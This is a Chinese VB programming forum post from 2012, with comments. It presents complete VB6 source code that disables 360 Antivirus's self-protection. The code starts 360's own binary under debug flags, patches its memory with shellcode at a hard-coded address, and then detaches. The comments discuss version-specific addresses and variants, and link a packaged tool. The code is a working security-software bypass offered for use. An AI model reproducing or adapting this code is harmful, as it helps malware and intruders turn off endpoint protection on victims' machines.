VBGood网站全文搜索 Google

搜索VBGood全站网页(全文搜索)

VB爱好者乐园(VBGood)

 找回密码
 立即注册
搜索

晕倒,原来关360杀毒的自我保护这么简单……

2012-8-7 17:53| 发布者: acme_pjz| 查看: 1292| 评论: 5|原作者: wtywtykk|来自: 360

摘要: 今天研究360杀毒的自我保护,偶然发现的, 下面的代码比较简单,没自动获取路径,路径不一样的同志们自己改下,在win7x64,360sd3.1.0.3073测试通过Option Explicit Private Type STARTUPINFO cb As Long ...
今天研究360杀毒的自我保护,偶然发现的,
下面的代码比较简单,没自动获取路径,路径不一样的同志们自己改下,在win7x64,360sd3.1.0.3073测试通过
  1. Option Explicit

  2. Private Type STARTUPINFO
  3.         cb As Long
  4.         lpReserved As String
  5.         lpDesktop As String
  6.         lpTitle As String
  7.         dwX As Long
  8.         dwY As Long
  9.         dwXSize As Long
  10.         dwYSize As Long
  11.         dwXCountChars As Long
  12.         dwYCountChars As Long
  13.         dwFillAttribute As Long
  14.         dwFlags As Long
  15.         wShowWindow As Integer
  16.         cbReserved2 As Integer
  17.         lpReserved2 As Long
  18.         hStdInput As Long
  19.         hStdOutput As Long
  20.         hStdError As Long
  21. End Type
  22. Private Type PROCESS_INFORMATION
  23.         hProcess As Long
  24.         hThread As Long
  25.         dwProcessId As Long
  26.         dwThreadId As Long
  27. End Type
  28. Private Const SW_NORMAL = 1
  29. Private Const DEBUG_PROCESS = &H1
  30. Private Const NORMAL_PRIORITY_CLASS = &H20
  31. Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
  32. Private Declare Function DebugActiveProcessStop Lib "kernel32" (ByVal dwProcessId As Long) As Long
  33. Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
  34. Private Const FileName = "C:\Program Files (x86)\360\360sd\dep360.exe"
  35. Private Const CommandLine = "/shutdownsdsp"
  36. Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

  37. Public Sub Main()
  38.     Dim SI As STARTUPINFO
  39.     Dim PI As PROCESS_INFORMATION
  40.     If CreateProcess(FileName, CommandLine, 0, 0, 0, NORMAL_PRIORITY_CLASS Or DEBUG_PROCESS, ByVal 0, App.Path, SI, PI) Then
  41.         Dim b(255) As Byte
  42.         b(0) = &H6A
  43.         b(1) = &H1
  44.         
  45.         b(2) = &HE8
  46.         b(3) = &HD7
  47.         b(4) = &H7D
  48.         b(5) = &HFC
  49.         b(6) = &HFF
  50.         
  51.         b(7) = &HC3
  52.         
  53.         WriteProcessMemory PI.hProcess, ByVal &H447422, b(0), 255, 0&
  54.         DebugActiveProcessStop PI.dwProcessId
  55.         CloseHandle PI.hProcess
  56.         CloseHandle PI.dwThreadId
  57.     Else
  58.         MsgBox "错误" & Err.LastDllError & "启动进程失败", vbCritical
  59.     End If
  60. End Sub

复制代码
发表评论

最新评论

引用 红色狂想 2012-8-7 18:34
是不是在所有x86平台上都不起作用?
引用 wtywtykk 2012-8-7 18:49
红色狂想 发表于 2012-8-7 18:34
是不是在所有x86平台上都不起作用?

不知道,我目前找不到32位的win7,测试发现250把WriteProcessMemory和DebugActiveProcessStop给hook了,DebugActiveProcessStop影响不大,但WriteProcessMemory不能用就……还有这个只能对3.1.0.3037有效,其他版本地址和汇编码要改
引用 h907308901 2012-8-8 08:08
用CREATE_SUSPEND+NtResumeProcess如何
引用 wtywtykk 2012-8-8 22:06
OFF3602.zip (10.96 KB, 下载次数: 804)
引用 zhdgzhdg 2012-8-9 09:44
确实简单有效。

查看全部评论(5)

相关分类

文字版|手机版|小黑屋|VBGood  

GMT+8, 2021-4-14 01:08

VB爱好者乐园(VBGood)
返回顶部